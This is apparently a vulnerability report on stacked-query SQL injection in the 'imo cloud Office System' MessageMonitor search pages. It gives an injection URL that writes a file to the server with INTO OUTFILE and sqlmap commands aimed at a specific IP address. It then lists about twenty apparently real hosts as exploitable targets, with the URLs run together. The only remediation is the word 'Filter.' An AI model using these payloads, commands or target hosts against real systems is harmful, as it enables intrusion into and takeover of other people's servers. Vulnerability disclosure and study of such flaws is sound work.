Arbitrary SQL Execution Vulnerability (getshell) in the imo cloud Office System)
Rt
This vulnerability is an SQL injection vulnerability. However, the mysql PDO query system can execute multiple statements, which is equivalent to arbitrary SQL statement execution.
Files with vulnerabilities:
/Customize/Audit/MessageMonitor/groupSearch.php?id=1/Customize/Audit/MessageMonitor/mutilSearch.php?id=1/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))
Execute the select statement to write files to the server:
http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1;select 0x776F6F79756E2E6F7267 into outfile '/tmp/wooyun.txt'%23
Use sqlmap to Test 1:
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))*" --random-agent --dbms=mysql
Use sqlmap to Test 2:
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1" --random-agent --dbms=mysql --dbs
There are many examples of using this system:
http://124.127.184.106/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://220.249.78.238/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.2.165.51/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://114.112.88.208/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://61.186.41.230/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://61.128.175.188:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://120.33.48.13:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://120.33.48.12:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://116.228.58.90:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://60.2.187.226:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://60.2.41.246/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.5.224.65:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://58.118.64.9/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://42.49.39.72:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://114.247.46.73/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://183.64.106.66/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://219.148.143.126:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://122.10.19.52/server/page_download http://220.249.78.238/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://211.142.200.34/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.224.21.25:8888/Customize/Audit/MessageMonitor/groupSearch.php?id=1
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1" --random-agent --dbms=mysql --dbs
Solution:
Filter.